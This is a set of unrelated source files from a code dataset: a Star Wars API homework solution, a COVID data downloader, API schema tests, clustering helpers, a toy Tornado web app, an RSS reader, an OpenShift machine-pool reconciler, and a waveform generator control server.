First Order has on a person.\n\n Instance Variables:\n name (str): Name of the person.\n hair_color (str): Hair color of the person.\n eye_color (str): Eye color of the person.\n species_name (str): Name of the species of the person.\n location (str): Current planet the person is known to be operating on.\n The location starts out as 'unknown' until we can cross-reference our\n central databases with the information from our informants. THAT'S YOUR\n JOB!\n \"\"\"\n\n def __init__(self, name, hair_color, eye_color, species_name):\n\n self.name = name\n self.hair_color = hair_color\n self.eye_color = eye_color\n self.species_name = species_name\n self.location = 'unknown'\n\n def __str__(self):\n\n description = f\"{self.name} is a {self.species_name} with {self.hair_color} hair and {self.eye_color} eyes. 
Location: {self.location}\"\n        return description\n\n    def evaluate_information(self, information_dict):\n        \"\"\"\n        This method will take a dictionary that has the following keys:\n\n        hair_color, eye_color, species_name, location, name\n\n        and it will check if the values to those keys are the exact same as the\n        respective instance variable (e.g. information_dict['name'] should be the same as self.name). If\n        all keys are the same, then update self.location to be the value of the\n        'location' key.\n\n        Parameters:\n            information_dict (dict): A dictionary of information to compare with the instance\n                variables.\n\n        Returns:\n            None, but has the potential to update self.location\n        \"\"\"\n\n        if information_dict['name'] == self.name and information_dict['hair_color'] == self.hair_color and information_dict['eye_color'] == self.eye_color and information_dict['species_name'] == self.species_name:\n            self.location = information_dict['location']\n\n\n# PROBLEM 05: Build the main() function following the cues\ndef main():\n    \"\"\"\n    This function will use various utility functions, classes, and methods to determine\n    the location of two Resistance members: Rey and Chewbacca. Nothing is returned from\n    this function, however a file is produced.\n\n    Parameters:\n        None\n\n    Returns:\n        None\n    \"\"\"\n\n    # First, call get_swapi_resource() with the correct parameters (you'll likely want\n    # to pass a parameters dictionary like so: {'search':'rey'}) to retrieve a\n    # dictionary of data about Rey. Save it to rey_data. Make sure rey_data is a\n    # dictionary, and not a list!\n    rey_data = get_swapi_resource(ENDPOINT + '/people', {'search':'rey'})\n    rey_data = rey_data['results'][0]\n\n    print(f\"\\n Rey species = {rey_data['species']}\\n\")\n\n    # Now, get Rey's species name by making a request to the url that is contained in the string\n    # stored in rey_data['species']. Save the name of that species to rey_species.\n    # rey_species should be a string. Then, add a new key/value pair to rey_data\n    # which has a key of \"species_name\" and a value of rey_species.\n    rey_species = get_swapi_resource(rey_data['species'][0])\n    rey_species = rey_species['name']\n    rey_data['species_name'] = rey_species\n\n    # Do the same thing for Chewbacca, saving the information to chewbacca_data and\n    # chewbacca_species.\n    chewbacca_data = get_swapi_resource(ENDPOINT + '/people', {'search':'chewbacca'})\n    chewbacca_data = chewbacca_data['results'][0]\n    chewbacca_species = get_swapi_resource(chewbacca_data['species'][0])\n    chewbacca_species = chewbacca_species['name']\n    chewbacca_data['species_name'] = chewbacca_species\n\n    # Create instances of Person for both Rey and Chewbacca using the data you have stored\n    # in the dictionaries rey_data and chewbacca_data, and the strings rey_species, chewbacca_species\n    rey = Person(rey_data['name'], rey_data['hair_color'], rey_data['eye_color'], rey_data['species_name'])\n    chewbacca = Person(chewbacca_data['name'], chewbacca_data['hair_color'], chewbacca_data['eye_color'], chewbacca_data['species_name'])\n\n    print(f\"\\nChewie species = {chewbacca.species_name}\\n\")\n\n\n    # Read in the data from the informants using the read_json() function.\n    # Make a new list rey_info that only contains the information on rey.\n    # Make a new list chewbacca_info that only contains the information on chewbacca.\n    # If you are confused, look at the keys of the dictionary that resulted from your\n    # call to read_json().\n    informant_info = read_json('informants.json')\n    rey_info = informant_info['information_on_rey']\n    chewbacca_info = informant_info['information_on_chewbacca']\n\n    # For each dictionary in rey_info, utilize the evaluate_information() method from the\n    # instance of Person for Rey. Only one entry of rey_info should flag as True and update\n    # Rey's location. Then, do the same for Chewbacca.\n
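    # (Editor's sketch, not part of the original assignment:) informants.json is\n    # assumed to hold one list of candidate sightings per person, e.g.:\n    #   {\"information_on_rey\": [{\"name\": ..., \"hair_color\": ..., \"eye_color\": ...,\n    #                            \"species_name\": ..., \"location\": ...}, ...],\n    #    \"information_on_chewbacca\": [...]}\n    # Each dict is compared field by field by Person.evaluate_information().\n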
    for info in rey_info:\n        rey.evaluate_information(info)\n\n    for info in chewbacca_info:\n        chewbacca.evaluate_information(info)\n\n    print(rey)\n    print(chewbacca)\n\n    # Create a new dictionary out_dict with only two key/value pairs:\n    #\n    # {\n    #    'Rey': str(rey),\n    #    'Chewbacca': str(chewbacca)\n    # }\n    out_dict = {}\n    out_dict['Rey'] = str(rey)\n    out_dict['Chewbacca'] = str(chewbacca)\n\n    # Write out your new dictionary to updated_information.json using write_json()\n    write_json('updated_information.json', out_dict)\n\n# END ASSIGNMENT\n\nif __name__ == '__main__':\n    main()\n","sub_path":"problem_sets/ps_09-2020Winter/problem_set_09_solution.py","file_name":"problem_set_09_solution.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"361078329","text":"#!/usr/bin/python3\n\nimport requests\nimport json\nimport re\n\nUS_URL = \"https://covidtracking.com/api/states/daily\"\nDatasetsDir = './Datasets/US'\nstatesCodesFile = \"./us-codes-to-states.json\"\n\ncodesAndStatesMap = dict()\nfilenameToHandlerMap = dict()\nstateCodeToDataMap = dict()\ndoneWithStateData = dict()\n\n\ndef replaceSpecialCharacters(filename):\n    filename = re.sub(r'\\s+', ' ', filename)\n    filename = filename.replace(' ', '-')\n    filename = filename.replace('(', '')\n    filename = filename.replace('.', '')\n    filename = filename.replace(')', '')\n\n    return filename\n\n\ndef prepareCodeAndStates():\n    fhandle = open(statesCodesFile)\n    codesAndStatesMap = json.load(fhandle)\n    headerLine = \"Day,Date,Confirmed,Recovered,Deaths\\n\"\n\n    for stateCode in codesAndStatesMap:\n        stateName = codesAndStatesMap[stateCode]\n        filename = replaceSpecialCharacters(stateName)\n        filename = DatasetsDir + '/' + filename + '.csv'\n        fileHandler = open(filename, 'w')\n        fileHandler.write(headerLine)\n        filenameToHandlerMap[stateCode] = fileHandler\n        stateCodeToDataMap[stateCode] = list()\n        doneWithStateData[stateCode] = False\n\n\ndef modifyDate(date):\n    date = str(date)\n    i = 0\n    newDate = \"\"\n    for char in date:\n        newDate += char\n        i += 1\n        if i == 4 or i == 6:\n            newDate += '-'\n\n    return newDate\n\n\ndef anyElement(arr, function):\n    for element in arr:\n        if function(element):\n            return True\n    return False\n\n\nprepareCodeAndStates()\nresponse = requests.get(US_URL)\njsonData = response.json()\n# print(jsonData)\nprint(\"Fetching Done!\")\n\nday = 0\nprevDate = None\nfor stateObject in jsonData:\n    stateCode = stateObject[\"state\"]\n    date = stateObject[\"date\"]\n    date = modifyDate(date)\n    if prevDate is None or prevDate != date:\n        day += 1\n\n    confirmedCases = stateObject[\"positive\"]\n    recoveredCases = stateObject[\"recovered\"]\n    deaths = stateObject[\"death\"]\n\n    fhandle = filenameToHandlerMap[stateCode]\n    itemsToWrite = [day, date, confirmedCases, recoveredCases, deaths]\n    if (not doneWithStateData[stateCode]) and (not anyElement(itemsToWrite, lambda x: x is None)):\n        lineToWrite = ', '.join(list(map(str, itemsToWrite)))\n        lineToWrite += \"\\n\"\n        stateCodeToDataMap[stateCode].insert(0, lineToWrite)\n    else:\n        doneWithStateData[stateCode] = True\n    prevDate = date\n\nprint(\"Data prepared!\")\n\nfor stateCode in filenameToHandlerMap:\n    fileHandler = filenameToHandlerMap[stateCode]\n    linesToWrite = stateCodeToDataMap[stateCode]\n    fileHandler.writelines(linesToWrite)\n    fileHandler.close()\nprint(\"Data 
written!\")\n","sub_path":"World-Wide-Covid19/us-pull.py","file_name":"us-pull.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"319249457","text":"import pytest\n\nfrom ..utils import as_param, integer, string\n\n\n@pytest.mark.parametrize(\n \"parameter\",\n (\n integer(name=\"id1\", required=True),\n integer(name=\"id2\", maximum=5, required=True),\n integer(name=\"id3\", maximum=5, exclusiveMaximum=True, required=True),\n integer(name=\"id4\", maximum=5, multipleOf=4, required=True),\n integer(name=\"id5\", minimum=5, required=True),\n integer(name=\"id6\", minimum=5, exclusiveMinimum=True, required=True),\n integer(name=\"id7\", minimum=5, multipleOf=4, required=True),\n ),\n)\ndef test_integer(testdir, parameter):\n testdir.make_test(\n \"\"\"\nvalidator = {{\n \"id1\": noop,\n \"id2\": lambda x: x <= 5,\n \"id3\": lambda x: x < 5,\n \"id4\": lambda x: x % 4 == 0,\n \"id5\": lambda x: x >= 5,\n \"id6\": lambda x: x > 5,\n \"id7\": lambda x: x % 4 == 0,\n}}[\"{name}\"]\n@schema.parametrize()\n@settings(max_examples=3)\ndef test_(case):\n assert case.path == \"/v1/users\"\n assert case.method in (\"GET\", \"POST\")\n validator(case.query[\"{name}\"])\n \"\"\".format(\n name=parameter[\"name\"]\n ),\n **as_param(parameter),\n )\n testdir.run_and_assert(passed=1)\n\n\n@pytest.mark.parametrize(\n \"parameter\",\n (\n string(name=\"key1\", required=True),\n string(name=\"key2\", maxLength=5, required=True),\n string(name=\"key3\", minLength=5, required=True),\n string(name=\"key4\", pattern=\"ab{2}\", required=True),\n string(name=\"key5\", minLength=3, maxLength=6, pattern=\"ab{2}\", required=True),\n string(name=\"key6\", format=\"date\", required=True),\n string(name=\"key7\", format=\"date-time\", required=True),\n string(name=\"key8\", type=\"file\", required=True),\n ),\n)\ndef test_string(testdir, parameter):\n testdir.make_test(\n \"\"\"\nvalidator = {{\n \"key1\": noop,\n \"key2\": lambda x: len(x) <= 5,\n \"key3\": lambda x: len(x) >= 5,\n \"key4\": lambda x: \"abb\" in x,\n \"key5\": lambda x: len(x) in (3, 4, 5, 6) and \"abb\" in x,\n \"key6\": assert_date,\n \"key7\": assert_datetime,\n \"key8\": assert_bytes,\n}}[\"{name}\"]\n@schema.parametrize()\n@settings(max_examples=3)\ndef test_(case):\n assert case.path == \"/v1/users\"\n assert case.method in (\"GET\", \"POST\")\n validator(case.query[\"{name}\"])\n \"\"\".format(\n name=parameter[\"name\"]\n ),\n **as_param(parameter),\n )\n testdir.run_and_assert(passed=1)\n","sub_path":"test/generation/test_primitive.py","file_name":"test_primitive.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"653398828","text":"import scipy.cluster\n\n################################################################################\n\ndef cluster_frequencies(plv, byc):\n\n m = plv.get(\"plot_cluster_metric\", \"complete\")\n\n matrix = matrix_from_interval_frequencies(plv, byc)\n linkage = scipy.cluster.hierarchy.linkage(matrix, method=m)\n dendrogram = scipy.cluster.hierarchy.dendrogram(linkage, no_plot=True, orientation=\"right\")\n \n return dendrogram\n\n################################################################################\n\ndef matrix_from_interval_frequencies(plv, byc):\n\n matrix = []\n\n for f_set in plv[\"results\"]:\n\n i_f = f_set.get(\"interval_frequencies\", [])\n if_line = []\n\n for i_f in 
f_set.get(\"interval_frequencies\", []):\n            if_line.append( i_f.get(\"gain_frequency\", 0) )\n        for i_f in f_set.get(\"interval_frequencies\", []):\n            if_line.append( i_f.get(\"loss_frequency\", 0) )\n\n        matrix.append(if_line)\n\n    return matrix\n\n################################################################################\n\ndef cluster_samples(plv, byc):\n\n    m = plv.get(\"plot_cluster_metric\", \"complete\")\n\n    matrix = []\n\n    for s in plv[\"results\"]:\n        s_line = []\n\n        if \"intcoverage\" in plv.get(\"plot_samples_cluster_type\", \"\"):\n\n            c_m = s.get(\"cnv_statusmaps\", {})\n            dup_l = c_m.get(\"dup\", [])\n            del_l = c_m.get(\"del\", [])\n            for i_dup in dup_l:\n                s_line.append(i_dup)\n            for i_del in del_l:\n                s_line.append(i_del)\n        else:\n            c_s = s.get(\"cnv_chro_stats\", {})\n            for c_a, c_s_v in c_s.items():\n                s_line.append(c_s_v.get(\"dupfraction\", 0))\n            for c_a, c_s_v in c_s.items():\n                s_line.append(c_s_v.get(\"delfraction\", 0))\n\n        matrix.append(s_line)\n\n    linkage = scipy.cluster.hierarchy.linkage(matrix, method=m)\n    reorder = scipy.cluster.hierarchy.leaves_list(linkage)\n    dendrogram = scipy.cluster.hierarchy.dendrogram(linkage, no_plot=True, orientation=\"right\")\n\n    return dendrogram\n","sub_path":"bycon/lib/clustering_utils.py","file_name":"clustering_utils.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"462693568","text":"import datetime\nimport hashlib\nimport logging\nimport sys\n\n\nVERBOSITY = logging.DEBUG\n\n\ndef get_logger(name):  # configure log style\n    ch = logging.StreamHandler(sys.stdout)\n    ch.setLevel(VERBOSITY)\n    ch.setFormatter(logging.Formatter('[%(asctime)s][%(name)s-%(levelname)s] %(message)s'))\n    logger = logging.getLogger(name)\n    logger.setLevel(VERBOSITY)\n    logger.addHandler(ch)\n    return logger\n\n\ndef calculate_sha256(path):\n    with open(path, 'rb') as f:\n        sh = hashlib.sha256()\n        sh.update(f.read())\n    return sh.hexdigest()\n\n\ndef get_timestr():\n    return datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n","sub_path":"tools/common/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"239474905","text":"from tornado.web import Application, RequestHandler\nimport tornado.ioloop\nimport uimethods as mt\nimport uimodules as md\ntransfer = []\nUSER_INFO = {'isLogin': None}\nNEWS_list = [\n    {\"title\": \"哈哈哈\", \"content\": \"笑什么笑,哼。。。\"},\n    {\"title\": \"啦啦啦\", \"content\": \"得意,哼。。。\"},\n\n]\nclass myTor(RequestHandler):\n    def get(self, *args, **kwargs):\n        # return self.write(\"hello world\")\n        self.render(\"s1.html\", npm = transfer)\n\n    def post(self, *args, **kwargs):\n        title = self.get_argument(\"title\")\n        comment = self.get_argument(\"comment-area\")\n        transfer.append({'title': title})\n        transfer.append({'comment': comment})\n        self.redirect('/index')\n\nclass IndexHander(RequestHandler):\n    def get(self, *args, **kwargs):\n        # return self.write(\"hello world\")\n        self.render(\"chouti.html\", user_info = USER_INFO, newsList = NEWS_list)\n\n    def post(self, *args, **kwargs):\n        title = self.get_argument(\"title\")\n        comment = self.get_argument(\"comment-area\")\n        transfer.append({'title': title})\n        transfer.append({'comment': comment})\n        self.set_cookie('auth', '1')\n        self.redirect('/index')\n\nclass LoginHander(RequestHandler):\n    def post(self, *args, **kwargs):\n        username = self.get_argument(\"username\", None)\n        pwd = self.get_argument(\"pwd\", 
None)\n        if username == 'tangxu' and pwd == '123':\n            USER_INFO['isLogin'] = True\n            USER_INFO['username'] = username\n            self.render('chouti.html', user_info = USER_INFO, newsList = NEWS_list)\n\n\nclass PublishHander(RequestHandler):\n    def post(self, *args, **kwargs):\n        co = self.get_cookie('auth')\n        title = self.get_argument(\"title\", None)\n        content = self.get_argument(\"content\", None)\n        print(title, content)\n        essay = {\"title\": title, \"content\": content}\n        NEWS_list.append(essay)\n        self.redirect('/chouti')\n\nclass LogoutHander(RequestHandler):\n    def get(self, *args, **kwargs):\n        USER_INFO['isLogin'] = False\n        self.redirect('/chouti')\n\nsettings = {\n    \"static_path\": \"static\",\n    \"template_path\": \"template\",\n    \"ui_methods\": mt,\n    \"ui_modules\": md,\n}\n\napplication = Application([\n    (r'/index', myTor),\n    (r'/chouti', IndexHander),\n    (r'/login', LoginHander),\n    (r'/publish', PublishHander),\n    (r'/Logout', LogoutHander),\n], **settings)\n\nif __name__ == \"__main__\":\n    application.listen(8000)\n    tornado.ioloop.IOLoop.instance().start()","sub_path":"myTo.py","file_name":"myTo.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"421553001","text":"#!/usr/bin/python3\nimport feedparser as fp\nimport re\nimport sqlite3\nimport os\n\n\"\"\" Asks for the user input of the urls he wishes to parse \"\"\"\ndef ask_urls():\n    urls = []\n    while True:\n        url = input(\"\\nType the url of an RSS feed or type \\\"done\\\" if you're done\\n\")\n        if url != \"done\" and url not in urls:\n            urls.append(url)\n        elif url == \"done\":\n            break\n        else:\n            print(\"\\nYou've already typed this url\\n\")\n    return urls\n\n\"\"\" Receives a list of urls and returns a list of feedparser objects \"\"\"\ndef feeder(urls):\n    feeds = []\n    for i in range(len(urls)):\n        feeds.append(fp.parse(urls[i]))\n    return feeds\n\n\n\"\"\" Stores urls in a SQLite database (rss_urls.db); it receives a list of url strings \"\"\"\ndef store_RSS_urls(urls):\n    if os.path.exists(\"rss_urls.db\"):\n        os.remove(\"rss_urls.db\")\n\n    rss_urls = sqlite3.connect(\"rss_urls.db\")\n    cursor = rss_urls.cursor()\n    cursor.execute(\"\"\" CREATE TABLE links \n                    (\n                    url text,\n                    ind integer primary key\n                    ) \n                    \"\"\")\n    rss_urls.commit()\n\n    n = len(urls)\n    for i in range(n):\n        url = urls[i]\n        cursor.execute(\"INSERT INTO links VALUES (?, ?);\", (url, i))\n        rss_urls.commit()\n    rss_urls.close()\n\n\"\"\" Receives a feedparser object and displays every article in it \"\"\"\ndef display_articles(feed):\n    print(len(feed.entries))\n    for i in range(len(feed.entries)):\n        print(\"Article {}\".format(i+1))\n        try:\n            title = feed.entries[i].title\n        except:\n            title = \"Unknown\"\n        try:\n            author = feed.entries[i].source.title\n        except:\n            try:\n                author = feed.entries[i].author\n            except:\n                author = \"Unknown\"\n        try:\n            category = feed.entries[i].category\n        except:\n            category = \"Unknown\"\n        try:\n            date = feed.entries[i].published\n        except:\n            date = \"Unknown\"\n        print(\"Title: {}\\nAuthor: {}\\nCategory: {}\\nDate Published: {}\\n\".format(title, author, category, date))\n\n\n\"\"\" Receives a feedparser.entries object and displays its description and full summary if the user wishes to do so \"\"\"\ndef display_description(feed_entry):\n    summary = feed_entry.summary\n    remove_tag = re.compile(r\"(<.*>)([^.]*)\")\n    match = remove_tag.findall(summary)\n    #print(match[0][1])\n    #import pdb;pdb.set_trace()\n    if match[0][1] is not None:\n        print(match[0][1] + 
\"...\")\n else:\n print(match[0][0] + \"...\")\n ask_summary = input(\"Do you wish to display the whole text of the article? [Y/N]\\n\")\n if ask_summary == \"Y\":\n print(summary)\n\n\ndef astronaut():\n print(\"\"\" _..._\n .' '. _\n / .-\"\"-\\ _/ \\\n .-| /:. | | |\n | \\ |:. /.-'-./\n | .-'-;:__.' =/\n .'= *=|NASA _.='\n / _. | ;\n ;-.-'| \\ |\n/ | \\ _\\ _\\\n\\__/'._;. ==' ==\\\n \\ \\ |\n / / /\n /-._/-._/\n jgs \\ `\\ \\\n `-._/._/\n \"\"\")\n\n\n\"\"\" Main Functions, calls all the other functions and gets the input from the user \"\"\"\nif __name__==\"__main__\":\n astronaut()\n urls = ask_urls()\n while True:\n delete_url = input(\"Do you want to exclude any previously typed url? [Y/N]:\\n\")\n if delete_url == \"Y\":\n remove = input(\"\\ntype the url you wish to remove:\\n\")\n urls.remove(remove)\n print(\"\\nurl: {} removed!\\n\".format(remove))\n elif delete_url == \"N\":\n break\n\n print(\"\\ncurrent rss feeds:\")\n\n for item in urls:\n print(item)\n\n #file_path = input(\"\\nType the file path you wish to save your RSS urls: (i.e d:/tmp/rss.txt)\\n\")\n store_RSS_urls(urls)\n\n for i in range(len(urls)):\n print(\"\\n{}- url:\\t{}\\n\".format(i+1, urls[i]))\n\n\n index = int(input(\"From the list above, type the number that corresponds to the url you wish to see the articles of\\n\"))\n feed = fp.parse(urls[index-1])\n display_articles(feed)\n while True:\n q_read_article = input(\"Do you wish to see a description from an article from the list above? [Y/N] (If you choose N the program will close)\\n\")\n if q_read_article == \"Y\":\n art_index = int(input(\"Type the article number you wish to see:\\n\")) - 1\n display_description(feed.entries[art_index])\n elif q_read_article == \"N\":\n break\n","sub_path":"rssfeeder/using_sqlite/RSSfeederSQL.py","file_name":"RSSfeederSQL.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157652893","text":"import json\nimport logging\nimport sys\nfrom collections.abc import Mapping\nfrom typing import Any\n\nfrom reconcile import queries\nfrom reconcile.utils.disabled_integrations import integration_is_enabled\nfrom reconcile.utils.ocm import OCMMap\n\nQONTRACT_INTEGRATION = \"ocm-machine-pools\"\n\n\ndef fetch_current_state(clusters):\n settings = queries.get_app_interface_settings()\n ocm_map = OCMMap(\n clusters=clusters, integration=QONTRACT_INTEGRATION, settings=settings\n )\n\n current_state = []\n for cluster in clusters:\n cluster_name = cluster[\"name\"]\n ocm = ocm_map.get(cluster_name)\n machine_pools = ocm.get_machine_pools(cluster_name)\n for machine_pool in machine_pools:\n machine_pool[\"cluster\"] = cluster_name\n current_state.append(machine_pool)\n\n return ocm_map, current_state\n\n\ndef fetch_desired_state(clusters):\n desired_state = []\n for cluster in clusters:\n cluster_name = cluster[\"name\"]\n machine_pools = cluster[\"machinePools\"]\n for machine_pool in machine_pools:\n machine_pool[\"cluster\"] = cluster_name\n labels = machine_pool.pop(\"labels\")\n if labels:\n machine_pool[\"labels\"] = json.loads(labels)\n taints = machine_pool.pop(\"taints\")\n if taints:\n machine_pool[\"taints\"] = taints\n desired_state.append(machine_pool)\n\n return desired_state\n\n\ndef calculate_diff(current_state, desired_state):\n diffs = []\n err = False\n for d in desired_state:\n c = [\n c\n for c in current_state\n if d[\"cluster\"] == c[\"cluster\"] and d[\"id\"] == c[\"id\"]\n ]\n if not c:\n d[\"action\"] = 
\"create\"\n diffs.append(d)\n continue\n if len(c) != 1:\n logging.error(f\"duplicate id found in {d['cluster']}\")\n err = True\n continue\n c = c[0]\n if c == d:\n continue\n if d[\"instance_type\"] != c[\"instance_type\"]:\n logging.error(\n f\"can not update instance type for existing \"\n f\"machine pool {d['id']} in {d['cluster']}\"\n )\n err = True\n continue\n d.pop(\"instance_type\")\n for key in [\"labels\", \"taints\"]:\n if c.get(key, None) != d.get(key, None):\n # https://github.com/openshift/machine-api-operator/blob/master/FAQ.md\n logging.warning(\n f\"update {key} for machine pool {d['id']} \"\n f\"will only be applied to new Nodes\"\n )\n d[\"action\"] = \"update\"\n diffs.append(d)\n\n for c in current_state:\n d = [\n d\n for d in desired_state\n if c[\"cluster\"] == d[\"cluster\"] and c[\"id\"] == d[\"id\"]\n ]\n if not d:\n c[\"action\"] = \"delete\"\n diffs.append(c)\n\n return diffs, err\n\n\ndef act(dry_run, diffs, ocm_map):\n for diff in diffs:\n action = diff.pop(\"action\")\n cluster = diff.pop(\"cluster\")\n logging.info([action, cluster, diff[\"id\"]])\n if not dry_run:\n ocm = ocm_map.get(cluster)\n if action == \"create\":\n ocm.create_machine_pool(cluster, diff)\n elif action == \"update\":\n ocm.update_machine_pool(cluster, diff)\n elif action == \"delete\":\n ocm.delete_machine_pool(cluster, diff)\n\n\ndef _cluster_is_compatible(cluster: Mapping[str, Any]) -> bool:\n return cluster.get(\"ocm\") is not None and cluster.get(\"machinePools\") is not None\n\n\ndef run(dry_run, gitlab_project_id=None, thread_pool_size=10):\n clusters = queries.get_clusters()\n clusters = [\n c\n for c in clusters\n if integration_is_enabled(QONTRACT_INTEGRATION, c) and _cluster_is_compatible(c)\n ]\n if not clusters:\n logging.debug(\"No machinePools definitions found in app-interface\")\n sys.exit(0)\n\n ocm_map, current_state = fetch_current_state(clusters)\n desired_state = fetch_desired_state(clusters)\n diffs, err = calculate_diff(current_state, desired_state)\n act(dry_run, diffs, ocm_map)\n\n if err:\n sys.exit(1)\n","sub_path":"reconcile/ocm_machine_pools.py","file_name":"ocm_machine_pools.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"544845195","text":"from Instrument.WaveformGenerator.USTCDAC.da_board import *\nimport filecmp\nfrom Instrument.WaveformGenerator.USTCDAC.data_waves import *\nimport matplotlib.pyplot as plt\n\n\nclass USTCDACServer:\n def __init__(self, ip, port=80, sessionPermenent=False, singleBoard=False):\n self.ip = ip\n self.port = port\n self.dev = None\n self.sessionInited = False\n self.sessionPermenent = sessionPermenent\n self.beginSession()\n self.dev.set_loop(1, 1, 1, 1)\n self.dev.set_multi_board(0 if not singleBoard else 1)\n self.dev.set_trig_select(0)\n self.endSession()\n\n def beginSession(self):\n if (not self.sessionInited) or (not self.sessionPermenent):\n self.dev = DABoard(id='{}:{}'.format(self.ip, self.port), ip=self.ip, port=self.port, batch_mode=False)\n self.dev.connect()\n\n def endSession(self):\n if (not self.sessionPermenent):\n self.dev.disconnect()\n self.dev = None\n\n def turnOn(self, channel):\n assert channel >= 1 and channel <= 4\n self.dev.start_output_wave(channel)\n\n def turnOff(self, channel):\n assert channel >= 1 and channel <= 4\n self.dev.stop_output_wave(channel)\n\n def turnOnAllChannels(self):\n for i in range(1, 5):\n self.turnOn(i)\n\n def turnOffAllChannels(self):\n for i in range(1, 5):\n 
self.turnOff(i)\n\n    def writeWaveform(self, channel, wave):\n        print('writing waveform of ', channel, 'with length of ', len(wave))\n\n        def loop_start_seq(wave_addr, wave_len, loop_level, loop_cnt):\n            assert loop_level in [0, 1, 2, 3]\n            assert wave_addr & 7 == 0\n            assert wave_len & 7 == 0\n            assert 0 < loop_cnt < 65536\n            ctrl = (0x1 << 11) | (loop_level << 8)\n            return [wave_addr >> 3, wave_len >> 3, loop_cnt, ctrl]\n\n        def loop_stop_seq(wave_addr, wave_len, loop_level, jump_addr):\n            assert loop_level in [0, 1, 2, 3]\n            assert wave_addr & 7 == 0\n            assert wave_len & 7 == 0\n            assert 0 <= jump_addr < 4095\n            ctrl = (0x2 << 11) | (loop_level << 8)\n            return [wave_addr >> 3, wave_len >> 3, jump_addr, ctrl]\n\n        wave_addr = 0  # the waveform is stored starting at address 0\n        length = len(wave)  # 100k sample points, a 50 us waveform\n        ctrl = 0x8 << 11\n        seq_T = [wave_addr >> 3, length >> 3, 0, ctrl]\n        loop_cnt = 4000  # each loop level runs 10000 times; 4 levels gives 10000 to the 4th power; every sequence outputs the 50 us waveform\n        seq_L1 = loop_start_seq(wave_addr, length, 0, loop_cnt)\n        seq_L2 = loop_start_seq(wave_addr, length, 1, loop_cnt)\n        seq_L3 = loop_start_seq(wave_addr, length, 2, loop_cnt)\n        seq_L4 = loop_start_seq(wave_addr, length, 3, loop_cnt)\n        seq_J1 = loop_stop_seq(wave_addr, length, 0, 1)\n        seq_J2 = loop_stop_seq(wave_addr, length, 1, 2)\n        seq_J3 = loop_stop_seq(wave_addr, length, 2, 3)\n        seq_J4 = loop_stop_seq(wave_addr, length, 3, 4)\n        ctrl = 0x8000\n        seq_S = [wave_addr >> 3, length >> 3, 0, ctrl]\n        seq = seq_T + seq_L1 + seq_L2 + seq_L3 + seq_L4 + seq_J4 + seq_J3 + seq_J2 + seq_J1 + seq_S\n\n        self.dev.write_seq_fast(channel, seq=seq)\n        self.dev.write_wave_fast(channel, wave=wave)\n\n    def sendTrigger(self, interval1, count1, interval2, count2):\n        self.dev.clear_trig_count()\n        self.dev.set_trig_count_l1(count1)\n        self.dev.set_trig_interval_l1(interval1)\n        self.dev.set_trig_count_l2(count2)\n        self.dev.set_trig_interval_l2(interval2)\n        self.dev.send_int_trig()\n\nclass MergedUSTCDACServer:\n    def __init__(self, awgs, channelMapping):\n        self.awgs = awgs\n        self.channelMapping = channelMapping\n\n    def turnOn(self, channel):\n        mappedChannel = self.channelMapping[channel]\n        self.awgs[mappedChannel[0]].beginSession()\n        self.awgs[mappedChannel[0]].turnOn(mappedChannel[1])\n        self.awgs[mappedChannel[0]].endSession()\n\n    def turnOff(self, channel):\n        mappedChannel = self.channelMapping[channel]\n        self.awgs[mappedChannel[0]].beginSession()\n        self.awgs[mappedChannel[0]].turnOff(mappedChannel[1])\n        self.awgs[mappedChannel[0]].endSession()\n\n    def turnOnAllChannels(self):\n        for awg in self.awgs:\n            awg.beginSession()\n            awg.turnOnAllChannels()\n            awg.endSession()\n\n    def turnOffAllChannels(self):\n        for awg in self.awgs:\n            awg.beginSession()\n            awg.turnOffAllChannels()\n            awg.endSession()\n\n    def writeWaveform(self, channel, wave):\n        mappedChannel = self.channelMapping[channel]\n        self.awgs[mappedChannel[0]].beginSession()\n        self.awgs[mappedChannel[0]].writeWaveform(mappedChannel[1], [(2 * v - 1) * 32765 for v in wave])\n        self.awgs[mappedChannel[0]].endSession()\n\n    def sendTrigger(self, awgIndex, interval1, count1, interval2, count2):\n        dev = self.awgs[awgIndex]\n        dev.beginSession()\n        dev.sendTrigger(interval1, count1, interval2, count2)\n        dev.endSession()\n\n\nif __name__ == '__main__':\n    from interactionfreepy import IFWorker\n    from interactionfreepy import IFLoop\n\n    awg = USTCDACServer('192.168.25.237', sessionPermenent=True)\n    IFWorker('tcp://192.168.25.5:224', 'USTCAWG_237', awg)\n\n    
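    # (Editor's note) A minimal direct-use sketch with placeholder IP/channel values,\n    # assuming only the class API defined above:\n    #   awg = USTCDACServer('192.168.0.10')\n    #   awg.beginSession()\n    #   awg.writeWaveform(1, wave)  # 'wave' is a list of raw 16-bit sample values\n    #   awg.turnOn(1)\n    #   awg.endSession()\n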
